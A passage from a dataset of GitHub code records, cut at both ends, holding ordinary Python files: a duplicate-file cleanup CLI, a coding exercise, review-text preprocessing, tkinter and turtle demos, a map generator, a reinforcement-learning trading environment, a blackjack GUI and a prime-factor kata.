fNode.set_status(\"NUKE\") # Strong guess this is duplicate vs. DB\n \n elif fNode.score >= lower_T: # May want to rethink another level/test because same\n fNode.set_status(\"CHECK\") # action for: score == min_score and score == lower_T\n\n else:\n fNode.set_status(\"NOTSURE\")# > 0 but < lower_T - likely name match only\n\n if fNode.score > 0: ## FIXME: Make commandline flag\n if kw and kw['all']:\n click.echo('[%5s] %s' % (fNode.score, fNode) )\n elif not kw['all'] and fNode.status not in ['CURSED', 'NUKE']:\n ##Default only show ones to save\n click.echo('[%5s] %s' % (fNode.score, fNode) )\n \n\n \"\"\" \n ## Possible way to look / check for dups in FS before thinking about db_add()\n click.echo(\"\")\n ## In this case the highest score(s) is actually a good thing\n ## e.g. store the highest score and you match a lot of the filesystem dups\n for fNode in file_list:\n if fNode.score > 0 or \"BLESSED\" in fNode.status: continue\n if not \"GOOD\" in fNode.status: continue ## Another way to filter\n fNode.score = fNode.test_unique(file_list)\n click.echo(\"%5s > %s\" % (fNode.score, fNode) )\n \"\"\"\n\n## FIXME: How does this relate to `flask ls` and scoring?\n\n@click.argument('path', type=click.Path(exists=True, file_okay=True,\n dir_okay=True, resolve_path=True), required=False)\n@click.option('-threshold', '-t', default=0)\n@click.option('--all/--no-all', default=False)\n@click.option('--blessed/--no-blessed', default=False)\n@click.option('--good/--no-good', default=False)\n@click.option('--nuke/--no-nuke', default=True)\n@click.command('hunt')\n@with_appcontext\ndef fs_hunt_command(path = None, **kw):\n \"\"\" HUNT for files on the filesystem based on BLESSED files in database.\"\"\"\n\n if path and os.path.isfile(path):\n fNode = AppDB.FileNode(path)\n fNode.score = fNode.test_unique()\n fNode.shade_unique()\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n return\n\n db, ds = AppDB.get_db()\n table = ds['files']\n\n if not path: path = os.getcwd()\n\n for r, subs, files in os.walk(path):\n if not check_dir(r): continue ## Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue ## Skip some files\n\n fNode_fs = AppDB.FileNode( os.path.join(r, f) )\n fNode_fs.score = fNode_fs.test_unique()\n fNode_fs.shade_unique()\n\n ## NOTE: This logic will *NOT* show BLESSED FILES as 'good' - SO DONT just RM DIR!!!\n if kw['all']:\n click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n else: ## Want more limited printing\n if kw['good'] and fNode_fs.status in ['CHECK', 'NOTSURE', 'GOOD', 'unknown']:\n click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n if kw['nuke'] and fNode_fs.status in ['CURSED', 'NUKE']:\n click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n if kw['blessed'] and fNode_fs.status in ['BLESSED']:\n click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n\n## FIXME: Placeholder - NEEDS TO BE COMPLETED\n@click.command('X_clean')\n@with_appcontext\ndef fs_clean_command(**kw):\n \"\"\"INCOMPLETE - Clean - aka DELETE - files on the filesystem \"\"\"\n dir_name = os.getcwd()\n\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue # Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue\n\n abs_src = os.path.join(r, f)\n fNode = AppDB.FileNode(abs_src)\n\n if not fNode.is_unique():\n click.echo('NUKE: %s' % (fNode) )\n else:\n click.echo('%s' % (fNode) )\n\n## FIXME: Placeholder - NEEDS TO BE COMPLETED\n@click.command('X_sweep')\n@click.option('--dst-name', default=False)\n@with_appcontext\ndef fs_sweep_command(**kw):\n \"\"\" INCOMPLETE - Sweap files on the filesystem \"\"\"\n dir_name = os.getcwd()\n if not kw['dst_name']: kw['dst_name'] = current_app.config['DST_DIR_NAME']\n\n replace_dir, _ = os.path.split(dir_name)\n\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue # Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue\n\n abs_src = os.path.join(r, f)\n fNode = AppDB.FileNode(abs_src)\n\n if fNode.is_unique():\n click.echo('%s' % (fNode) )\n new_dst = os.path.join(r, f).replace(replace_dir, kw['dst_name'])\n click.echo('\\t%s' % (new_dst) )\n\n ## FIXME: Need to figure out what to do w/ node \n ## - e.g. delete old, make new, store new?\n\n ## Maybe green means it's not in DB and is new \n ## purple means it is and should be deleted\n\n\n@click.argument('path', type=click.Path(exists=True, file_okay=True, \n dir_okay=True, resolve_path=True), required=False)\n@click.command('hash_scan')\n@with_appcontext\ndef hash_scan_command(path = False, **kw):\n \"\"\" Populate the database wih confirmed files \"\"\"\n if not path: path = os.getcwd()\n\n HASH_DB_PATH = 'sqlite:///' + '/Users/wjhuie/bin/instance/cleansweep_hashes.sqlite'\n click.echo(HASH_DB_PATH)\n\n db = dataset.connect(HASH_DB_PATH)\n hash_ds = db['hashes']\n\n def add_hash(fNode, table = hash_ds):\n if table.find_one(abs_path=fNode.abs_path): return\n\n fNode.get_hash()\n entry = { 'abs_path': fNode.abs_path, 'sha1': fNode.sha1 }\n\n try:\n table.upsert(entry, ['abs_path'])\n click.echo('HASH ADDED: %s # %s' % (fNode.sha1, fNode) )\n except:\n click.echo( \"Error trying to ADD HASH: %s\" % (fNode) )\n\n if path and os.path.isfile(path):\n fNode = AppDB.FileNode(path)\n add_hash(fNode)\n return\n\n for r, subs, files in os.walk(path):\n if not check_dir(r): continue ## Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue\n fNode = AppDB.FileNode( os.path.join(r, f) )\n add_hash(fNode)\n\n hash_ds.create_index(['abs_path', 'sha1'])\n\n","repo_name":"thecapacity/cleansweep","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":15738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1324871403","text":"#Uses python3\n\nimport sys\n\ndef largest_number(a):\n #write your code here\n res = \"\"\n controller = 0\n length = len(a)\n while controller < length:\n bm = \"0\"\n bm_index = -1\n for index in range(len(a)):\n temp1 = int(a[index] + bm)\n temp2 = int(bm + a[index])\n if temp1 > temp2:\n bm = a[index]\n bm_index = index\n\n a.pop(bm_index) # Delete that added number\n res = res + bm\n controller += 1\n\n res = int(res)\n\n return res\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n #input = input()\n data = input.split()\n a = data[1:]\n print(largest_number(a))\n\n","repo_name":"DimonYin/Coursera_Courses_Dimon_Yin","sub_path":"Data Structures and Algorithms (UCSD & NRUHSE)/Course 1_Algorithmic Toolbox/Week3/Programming Assignment 3_Greedy Algorithms/largest_number.py","file_name":"largest_number.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12143437998","text":"# Use pytorch_py3.8.8\n# Operations:\n # Remove non-ascii words.\n # Remove non-english texts.\n \nimport logging\nimport glob\nimport nltk.data\nfrom nltk.corpus import stopwords\nimport pandas as pd\nimport numpy as np\nfrom multiprocessing import Pool\nimport langdetect\nfrom langdetect import DetectorFactory\nfrom nltk.tokenize import word_tokenize\nimport os\n\nDetectorFactory.seed = 0\nlogging.basicConfig(\n # filename='out.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s')\nlogger = logging.getLogger(__name__)\n\n# All_Beauty\n# AMAZON_FASHION\n# CDs_and_Vinyl\n# Cell_Phones_and_Accessories\n# Digital_Music\n# Electronics\n# Industrial_and_Scientific\n# Luxury_Beauty\n# Musical_Instruments\n# Software\n# Video_Games\n\ndata_name = 'All_Beauty'\ndata_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Original/{data_name}/'\nsave_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Preprocess_common1/{data_name}/'\nfilenames = glob.glob(data_path + '*.csv')\nfilenames.sort()\nfilenames=[filenames[0]]\n\ntry:\n os.makedirs(save_path)\nexcept FileExistsError:\n pass\n\n#%%\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\nstop = stopwords.words('english')\n\nremove_nonascii_pattern = '([a-zA-Z]*[\\u0080-\\uFFFF]+[a-zA-Z]+|[a-zA-Z]+[\\u0080-\\uFFFF]+[a-zA-Z]*|[\\u0080-\\uFFFF]+)'\n\ndef remove_words(df, pattern=None): # If lemmatize: must use for loop\n df['reviewText'] = df['reviewText'].str.replace(pattern, '', regex=True)\n df['reviewText'] = df['reviewText'].str.split()\n df['reviewText'] = df['reviewText'].str.join(sep=' ')\n #df['reviewText'] = df['reviewText'].str.lower()\n return df\n\ndef remove_nonenglish_texts(df):\n is_english = []\n for rt in df['reviewText']:\n try:\n lang = langdetect.detect(rt)\n is_english.append(lang=='en')\n except:\n is_english.append(False)\n \n return df[is_english]\n\ndef add_SPOS_indices(df):\n positions = []\n for rt in df['reviewText']:\n rt_len = word_tokenize(rt)\n positions.append(np.arange(len(rt_len)).tolist())\n #df['SPOS_idx'] = np.arange(rt_len).tolist()\n \n df['SPOS_idx'] = positions\n return df\n \n \nprocesses = 16\ncurr_docid = 0\nfor i, fn in enumerate(filenames):\n logger.info(f\"Processing {(i+1)}/{len(filenames)}\")\n df_split = pd.read_csv(fn)\n # Add document id column (for sentence tokenization)\n df_split.insert(0,'doc_id',np.arange(curr_docid, curr_docid+df_split.shape[0]))\n curr_docid += df_split.shape[0]\n # Add new column to indicate word positions in StanfordPOS dataframe (used in later preprocessing steps)\n #df_split.insert(loc=4,column='SPOS_idx',value=np.nan)\n \n df_split = np.array_split(df_split, processes)\n pool = Pool(processes)\n \n logger.info(\"Removing non-ascii words...\")\n df_split = pool.starmap(remove_words, list(zip(df_split, [remove_nonascii_pattern]*processes)))\n \n logger.info(\"Removing non-english texts...\")\n df_split = pool.map(remove_nonenglish_texts, df_split)\n \n logger.info(\"Adding word positions...\")\n df_split = pool.map(add_SPOS_indices, df_split)\n \n logger.info(\"Saving...\")\n pool.close()\n pool.join()\n df_split = pd.concat(df_split)\n df_split['reviewText'].replace('', np.nan, inplace=True) \n df_split = df_split.dropna(subset=['reviewText'])\n fn = save_path + fn.split('/')[-1][:-4]+'_StanfordPOS.csv'\n df_split.to_csv(fn, index=False)\n \n \nlogger.info(\"Done!\")\n \n \n#%%\nfn='/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Preprocessed_common/All_Beauty/All_Beauty-0_StanfordPOS.csv'\ndf = pd.read_csv(fn)\n\ndf['SPOS_idx']=df['SPOS_idx'].apply(eval)\n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"TP1997/Text-Preprocessing","sub_path":"Sentiment/preprocess_common1.py","file_name":"preprocess_common1.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14799907232","text":"#!/usr/bin/python3\nimport sys\nfrom tkinter import *\nmywin = Tk()\n\n# Reaktion auf Mausklick im Fenster\ndef win_click(event):\n print(\"Mausklick\", event.x, event.y)\n\n# Reaktion auf Tastatureingabe\ndef win_key(event):\n print(\"Tastatureingabe\", event.char) \n if event.char.lower() == 'q': sys.exit()\n \n# Reaktion auf das Programmende\ndef win_close():\n # Aufräumarbeiten ..\n mywin.quit()\n \nmywin.geometry(\"100x100\")\nmywin.bind('', win_click)\nmywin.bind('', win_key) \nmywin.protocol(\"WM_DELETE_WINDOW\", win_close)\nmywin.mainloop()\n","repo_name":"Eskimo-SVD/Oliver_private_Bude","sub_path":"RaspberryPI_Handbuch/kap16-18-python/tkinter-events.py","file_name":"tkinter-events.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37922905048","text":"import tkinter as tk\n\nfrom ui.consts.ColorConsts import ColorConsts\n\nclass FormFieldFrame(tk.Frame):\n def __init__(self, window: tk.Tk, master: tk.Widget, label: type, entry: type, option_var: type = None, *widgets) -> None:\n super().__init__(\n master,\n background = ColorConsts.LIGHT_GREY,\n highlightthickness = 2,\n highlightbackground = ColorConsts.BLACK\n )\n self.window = window\n self.label = label(self.window, self)\n if option_var is not None:\n self.option_var = option_var(self.window, self)\n self.field = entry(self.window, self, self.option_var)\n else:\n self.field = entry(self.window, self)\n self.widgets = []\n for widget in widgets:\n self.widgets.append(widget(self.window, self))\n self.pack(fill = tk.X, padx = 15, pady = (15, 0))","repo_name":"wjrm500/Pawnfork","sub_path":"ui/window/main/create_deck/deck_form/FormFieldFrame.py","file_name":"FormFieldFrame.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"666413119","text":"#Macie Pelle Thursday 3:30pm\r\n#mpelle@purdue.edu\r\n#This program uses user defined functions that are called from the main function when the if statement is true for them\r\n# Academic Honesty:\r\n#I attestthat this is my original work.\r\n#I have not used unauthorized source code, either modified or unmodified.\r\n#I have not given other fellow student(s) access to my program.\r\n\r\ndef factorial(n):\r\n \r\n factorial = 1\r\n num = n\r\n #finds the factorial of the number entered by the user\r\n for i in range(1, n +1):\r\n factorial = factorial * i\r\n print(num, \"!=\", factorial, \"\\n\")\r\n \r\ndef sumOdds(x, y):\r\n \r\n print(\"Displaying odd numbers from n1 to n2 (n1<=n2)\")\r\n \r\n sum = 0\r\n #Prints off numbers from a range the user input and finds the sum\r\n for i in range(x, y + 1):\r\n if (i % 2 != 0):\r\n print(\" \")\r\n print(i, end= \" \")\r\n sum = sum + i\r\n print(\"\\n\")\r\n print(\"The sum of odd numbers is \", sum)\r\n \r\ndef sumInverse(n1, n2):\r\n print(\"Displaying the inverse of the numbers from n1 to n2 (n1<=n2)\")\r\n \r\n sum = 0.0\r\n #finds the inverse of numbers entered by the user and finds the sum\r\n for i in range(n1, n2+1):\r\n\r\n print(\"1 /\", str(i))\r\n\r\n sum = sum + (1 / i)\r\n #Prints the the sum of the numbers and formats them to two decimal places\r\n print(\"The sum of numbers between \", str(n1), \"and\", str(n2), \"is: \", \"{:.2f}\".format(sum))\r\n \r\ndef findChar(sentence, letter):\r\n \r\n sum = 0\r\n #finds the number of times a letter appears in a string\r\n for i in sentence:\r\n if i.upper() == letter.upper():\r\n sum = sum + 1\r\n #outputs the number of characters based on the user input\r\n print(\"The character\", letter, \"appeared \" + str(sum))\r\n \r\n\r\ndef main():\r\n #controls the while loop\r\n loopCtrl = True\r\n #when true, the commands in the loop will run\r\n while loopCtrl:\r\n #outputs the users choices\r\n print(\"==================User Defined Functions Menu==================\\n1. Compute n Factorial\\n2. Sum of all odd numbers from n1 to n2 (n1<=n2)\\n3. Sum of the inverse of the numbers between n1 and n2 (n1<=n2)\\n4. Find the number of characters\\n5. Exit\\n===============================================================\\n\")\r\n \r\n choice = int(input(\"Choose one of options to perform: \"))\r\n \r\n if choice == 1:\r\n print(\"1. Compute n Factorial\")\r\n \r\n n = int(input(\"Please enter a natural number for n: \"))\r\n #called into the main loop when choice 1 is inputted \r\n factorial(n)\r\n \r\n elif choice == 2:\r\n print(\"\\n2. Sum of all odd numbers from n1 to n2 (n1<=n2)\")\r\n #tells the user to input a value\r\n x = int(input(\"Please enter a natural number for n1: \"))\r\n y = int(input(\"Please enter a natural number for n2: \"))\r\n #called into the main loop when choice 2 is inputted \r\n sumOdds(x,y)\r\n \r\n elif choice == 3:\r\n print(\"\\n3. Sum of the inverse of the numbers between n1 and n2 (n1<=n2)\")\r\n \r\n n1 = int(input(\"Please enter a natural number for n1: \"))\r\n n2 = int(input(\"Please enter a natural number for n2: \"))\r\n #called into the main loop when choice 3 is inputted \r\n sumInverse(n1, n2)\r\n \r\n elif choice == 4:\r\n print(\"4. Find the number of characters\")\r\n \r\n sentence = input(\"Please enter the string to work on: \")\r\n letter = input(\"Please enter a character that you want to count in the string entered above: \")\r\n #called into the main loop when choice 4 is inputted \r\n findChar(sentence, letter)\r\n #Exits the for loop \r\n elif choice == 5:\r\n print(\"Bye\")\r\n loopCtrl = False\r\n #tells the user their input is invalid \r\n else:\r\n print(\"Invalid option! Enter a number between 1 and 5\")\r\n \r\nmain()","repo_name":"macaronios/CNIT-155","sub_path":"Assignment07.py","file_name":"Assignment07.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73343290969","text":"import random, math\n\ndef makeRoom():\n w = math.floor(random.random()*4)+2\n h = math.floor(random.random()*4)+2\n return [w,h]\n \ndef makeHall(wide):\n if wide:\n w = math.floor(random.random()*5)+5\n h = 2#math.floor(random.random()*2)+2\n else:\n w = 2#math.floor(random.random()*2)+2\n h = math.floor(random.random()*5)+5\n return [w,h]\n\nclass Room:\n def __init__(self, x, y, w, h):\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n \ndef genMap(size):\n # current = [makeRoom()]\n rooms = []\n cloks = [[0,0]]\n cSize = 0\n while cloks and cSize < size:\n c = makeRoom()#current.pop(0)\n loc = cloks.pop(0)\n croom = Room(loc[0], loc[1], c[0], c[1])\n rooms += [croom]\n # hall1 = makeHall(True)\n # rooms += [Room(croom.x-hall1[0], croom.y+2, hall1[0], hall1[1]]\n tallhall = makeHall(False)\n rooms += [Room(croom.x+2, croom.y+croom.h, tallhall[0], tallhall[1])]\n cloks += [[croom.x, croom.y+croom.h+tallhall[1]]]\n widehall = makeHall(True)\n rooms += [Room(croom.x+croom.w, croom.y+2, widehall[0], widehall[1])]\n cloks += [[croom.x+croom.w+widehall[0], croom.y]]\n cSize += 1\n return rooms\n \ndef drawMap(rooms):\n fullMap = [[1]*30 for i in range(0, 30)]\n # print([i.h for i in rooms])\n for i in rooms:\n for j in range(0, i.h):\n fullMap[i.y+j][i.x:i.x+i.w] = [0]*i.w\n return fullMap\n \ndef printMap(map):\n for i in map:\n print(''.join([str(j) for j in i]))\n \nprintMap(drawMap(genMap(3)))\n ","repo_name":"B3NJP/FinalSDDProject","sub_path":"MapGen.py","file_name":"MapGen.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4390645574","text":"import turtle\nt=turtle.Pen()\nt.speed(0)\ncolors=[\"red\",\"black\",\"blue\",\"orange\",\"green\",\"purple\",\"pink\"]\nfor x in range(200):\n sides=6\n t.pencolor(colors[x%sides])\n t.width(2)\n t.forward(x)\n t.left(60)","repo_name":"RishiKuls/turtle-programing-python","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33501699060","text":"import gym\nimport pandas as pd\nimport numpy as np\n\nfrom gym import spaces\nfrom enum import Enum\nfrom typing import List, Dict\n\nfrom lib.env.render import TradingChart\nfrom lib.env.reward import BaseRewardStrategy, IncrementalProfit, WeightedUnrealizedProfit\nfrom lib.env.trade import BaseTradeStrategy, SimulatedTradeStrategy\nfrom lib.data.providers import BaseDataProvider\nfrom lib.data.features.transform import max_min_normalize, mean_normalize, log_and_difference, difference\nfrom lib.util.logger import init_logger\n\n\nclass TradingEnvAction(Enum):\n BUY = 0\n SELL = 1\n HOLD = 2\n\n\nclass TradingEnv(gym.Env):\n '''A reinforcement trading environment made for use with gym-enabled algorithms'''\n metadata = {'render.modes': ['human', 'system', 'none']}\n viewer = None\n\n def __init__(self,\n data_provider: BaseDataProvider,\n reward_strategy: BaseRewardStrategy = IncrementalProfit,\n trade_strategy: BaseTradeStrategy = SimulatedTradeStrategy,\n initial_balance: int = 10000,\n commissionPercent: float = 0.25,\n maxSlippagePercent: float = 2.0,\n **kwargs):\n super(TradingEnv, self).__init__()\n\n self.logger = kwargs.get('logger', init_logger(__name__, show_debug=kwargs.get('show_debug', True)))\n\n self.base_precision: int = kwargs.get('base_precision', 2)\n self.asset_precision: int = kwargs.get('asset_precision', 8)\n self.min_cost_limit: float = kwargs.get('min_cost_limit', 1E-3)\n self.min_amount_limit: float = kwargs.get('min_amount_limit', 1E-3)\n\n self.initial_balance = round(initial_balance, self.base_precision)\n self.commissionPercent = commissionPercent\n self.maxSlippagePercent = maxSlippagePercent\n\n self.data_provider = data_provider\n self.reward_strategy = reward_strategy()\n self.trade_strategy = trade_strategy(commissionPercent=self.commissionPercent,\n maxSlippagePercent=self.maxSlippagePercent,\n base_precision=self.base_precision,\n asset_precision=self.asset_precision,\n min_cost_limit=self.min_cost_limit,\n min_amount_limit=self.min_amount_limit)\n\n self.render_benchmarks: List[Dict] = kwargs.get('render_benchmarks', [])\n self.normalize_obs: bool = kwargs.get('normalize_obs', True)\n self.stationarize_obs: bool = kwargs.get('stationarize_obs', True)\n self.normalize_rewards: bool = kwargs.get('normalize_rewards', False)\n self.stationarize_rewards: bool = kwargs.get('stationarize_rewards', True)\n\n self.n_discrete_actions: int = kwargs.get('n_discrete_actions', 24)\n self.action_space = spaces.Discrete(self.n_discrete_actions)\n\n self.n_features = 6 + len(self.data_provider.columns)\n self.obs_shape = (1, self.n_features)\n self.observation_space = spaces.Box(low=0, high=1, shape=self.obs_shape, dtype=np.float16)\n\n self.observations = pd.DataFrame(None, columns=self.data_provider.columns)\n\n def _current_price(self, ohlcv_key: str = 'Close'):\n return float(self.current_ohlcv[ohlcv_key])\n\n def _get_trade(self, action: int):\n n_action_types = 3\n n_amount_bins = int(self.n_discrete_actions / n_action_types)\n\n action_type: TradingEnvAction = TradingEnvAction(action % n_action_types)\n action_amount = float(1 / (action % n_amount_bins + 1))\n\n amount_asset_to_buy = 0\n amount_asset_to_sell = 0\n\n if action_type == TradingEnvAction.BUY and self.balance >= self.min_cost_limit:\n price_adjustment = (1 + (self.commissionPercent / 100)) * (1 + (self.maxSlippagePercent / 100))\n buy_price = round(self._current_price() * price_adjustment, self.base_precision)\n amount_asset_to_buy = round(self.balance * action_amount / buy_price, self.asset_precision)\n elif action_type == TradingEnvAction.SELL and self.asset_held >= self.min_amount_limit:\n amount_asset_to_sell = round(self.asset_held * action_amount, self.asset_precision)\n\n return amount_asset_to_buy, amount_asset_to_sell\n\n def _take_action(self, action: int):\n amount_asset_to_buy, amount_asset_to_sell = self._get_trade(action)\n\n asset_bought, asset_sold, purchase_cost, sale_revenue = self.trade_strategy.trade(buy_amount=amount_asset_to_buy,\n sell_amount=amount_asset_to_sell,\n balance=self.balance,\n asset_held=self.asset_held,\n current_price=self._current_price)\n\n if asset_bought:\n self.asset_held += asset_bought\n self.balance -= purchase_cost\n\n self.trades.append({'step': self.current_step,\n 'amount': asset_bought,\n 'total': purchase_cost,\n 'type': 'buy'})\n elif asset_sold:\n self.asset_held -= asset_sold\n self.balance += sale_revenue\n\n self.reward_strategy.reset_reward()\n\n self.trades.append({'step': self.current_step,\n 'amount': asset_sold,\n 'total': sale_revenue,\n 'type': 'sell'})\n\n current_net_worth = round(self.balance + self.asset_held * self._current_price(), self.base_precision)\n self.net_worths.append(current_net_worth)\n self.account_history = self.account_history.append({\n 'balance': self.balance,\n 'asset_held': self.asset_held,\n 'asset_bought': asset_bought,\n 'purchase_cost': purchase_cost,\n 'asset_sold': asset_sold,\n 'sale_revenue': sale_revenue,\n }, ignore_index=True)\n\n def _done(self):\n lost_90_percent_net_worth = float(self.net_worths[-1]) < (self.initial_balance / 10)\n has_next_frame = self.data_provider.has_next_ohlcv()\n\n return lost_90_percent_net_worth or not has_next_frame\n\n def _reward(self):\n reward = self.reward_strategy.get_reward(current_step=self.current_step,\n current_price=self._current_price,\n observations=self.observations,\n account_history=self.account_history,\n net_worths=self.net_worths)\n\n reward = float(reward) if np.isfinite(float(reward)) else 0\n\n self.rewards.append(reward)\n\n if self.stationarize_rewards:\n rewards = difference(self.rewards, inplace=False)\n else:\n rewards = self.rewards\n\n if self.normalize_rewards:\n mean_normalize(rewards, inplace=True)\n\n rewards = np.array(rewards).flatten()\n\n return float(rewards[-1])\n\n def _next_observation(self):\n self.current_ohlcv = self.data_provider.next_ohlcv()\n self.timestamps.append(pd.to_datetime(self.current_ohlcv.Date.item(), unit='s'))\n self.observations = self.observations.append(self.current_ohlcv, ignore_index=True)\n\n if self.stationarize_obs:\n observations = log_and_difference(self.observations, inplace=False)\n else:\n observations = self.observations\n\n if self.normalize_obs:\n observations = max_min_normalize(observations)\n\n obs = observations.values[-1]\n\n if self.stationarize_obs:\n scaled_history = log_and_difference(self.account_history, inplace=False)\n else:\n scaled_history = self.account_history\n\n if self.normalize_obs:\n scaled_history = max_min_normalize(scaled_history, inplace=False)\n\n obs = np.insert(obs, len(obs), scaled_history.values[-1], axis=0)\n\n obs = np.reshape(obs.astype('float16'), self.obs_shape)\n obs[np.bitwise_not(np.isfinite(obs))] = 0\n\n return obs\n\n def reset(self):\n self.data_provider.reset_ohlcv_index()\n\n self.balance = self.initial_balance\n self.net_worths = [self.initial_balance]\n self.timestamps = []\n self.asset_held = 0\n self.current_step = 0\n\n self.reward_strategy.reset_reward()\n\n self.account_history = pd.DataFrame([{\n 'balance': self.balance,\n 'asset_held': self.asset_held,\n 'asset_bought': 0,\n 'purchase_cost': 0,\n 'asset_sold': 0,\n 'sale_revenue': 0,\n }])\n self.trades = []\n self.rewards = [0]\n\n return self._next_observation()\n\n def step(self, action):\n self._take_action(action)\n\n self.current_step += 1\n\n obs = self._next_observation()\n reward = self._reward()\n done = self._done()\n\n return obs, reward, done, {'net_worths': self.net_worths, 'timestamps': self.timestamps}\n\n def render(self, mode='human'):\n if mode == 'system':\n self.logger.info('Price: ' + str(self._current_price()))\n self.logger.info('Bought: ' + str(self.account_history['asset_bought'][self.current_step]))\n self.logger.info('Sold: ' + str(self.account_history['asset_sold'][self.current_step]))\n self.logger.info('Net worth: ' + str(self.net_worths[-1]))\n\n elif mode == 'human':\n if self.viewer is None:\n self.viewer = TradingChart(self.data_provider.data_frame)\n\n self.viewer.render(self.current_step,\n self.net_worths,\n self.render_benchmarks,\n self.trades)\n\n def close(self):\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n","repo_name":"notadamking/RLTrader","sub_path":"lib/env/TradingEnv.py","file_name":"TradingEnv.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","stars":1669,"dataset":"github-code","pt":"31"} +{"seq_id":"29136528462","text":"from conf import *\nfrom play import Player\nfrom game_logic import *\n\nclass LoginGui(Frame):\n \"\"\"Login Frame\"\"\"\n def __init__(self, master):\n super().__init__(master, height = 700, width = 700)\n master.geometry('600x600')\n self.master = master\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n image = Image.open(\"./game_img/casino_bg.gif\")\n self.imageP = ImageTk.PhotoImage(image)\n l = Label(self, image=self.imageP)\n l.image = self.imageP\n l.place(x = 0, y = 0)\n self.title = Label(self, text=\"Welcome to BlackJack Board!\", font = (\"Times\", \"30\"), bg = \"black\", fg = \"white\")\n self.title.place(x=130,y=200)\n self.name = Label(self, text=\"Name\", font = (\"Times\", \"24\"), bg = \"black\" ,fg = \"white\")\n self.name.place(x=110,y=260)\n self.login_entry = Entry(self, width=20, bg = \"black\", fg = \"white\", highlightbackground = \"black\")\n self.login_entry.place(x=210,y=265)\n self.login_photo = PhotoImage(file = \"./game_img/login.gif\")\n self.button_login = Button(self, image = self.login_photo ,command = self.game_login, highlightbackground = \"black\")\n self.button_login.place(x=440,y=260)\n self.summary_window = Text(self, width = 25, height = 6, wrap = WORD, bg = \"black\", fg = \"white\", font = (\"Times\", \"20\"))\n self.summary_window.place(x=180,y=310)\n self.start_photo = PhotoImage(file = \"./game_img/start.gif\")\n self.button_play = Button(self, image = self. start_photo , command = self.game_start, highlightbackground = \"black\")\n self.button_play.place(x=75,y=500)\n\n def game_login(self):\n Player.name = self.login_entry.get()\n _, tries, wins, chips = View.get_record(Player.name)\n self.__tries = tries\n record = \"Name : \" + Player.name + \"\\n\"\n record += \"Game Tries : \" + str(tries) + \"\\n\"\n record += \"Win Games : \"+ str(wins) + \"\\n\"\n if tries == 0:\n record += \"Winning Rate : 0.0\" + \"\\n\"\n else:\n record += \"Winning Rate : \" + str(round((wins/tries)*100,2)) + \"\\n\"\n record += \"Chips : \" + str(chips)\n self.summary_window.insert(0.0, record)\n self.name.destroy()\n self.login_entry.destroy()\n self.button_login.destroy()\n\n def game_start(self):\n self.__tries+=1\n self.destroy()\n Game(self.master)","repo_name":"sonhl0723/blackjack-game","sub_path":"login_gui.py","file_name":"login_gui.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37772709070","text":"# https://www.codewars.com/kata/54d512e62a5e54c96200019e/solutions/python\n\ndef prime_factors(n):\n i = 2\n factors = {}\n\n while (i * i) <= n:\n if (n % i) == 0:\n factors.setdefault(i, 0)\n factors[i] += 1\n n //= i\n else:\n i += 1\n\n if n > 1:\n factors.setdefault(n, 0)\n factors[n] += 1\n\n res = ''\n\n for key in factors:\n if factors[key] == 1:\n res += f'({key})'\n else:\n res += f'({key}**{factors[key]})'\n return res\n\n","repo_name":"mlsimpson/codewars","sub_path":"5kyu/primes_in_numbers.py","file_name":"primes_in_numbers.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40125573885","text":"#!/usr/bin/env python\n\n\"\"\"This module contains code to work with soundcloud.\"\"\"\n\nimport json\nimport re\n\nimport requests\n\nfrom downspout import settings, utils\n\n\n# fetch all artist media at url, which has\n# the format 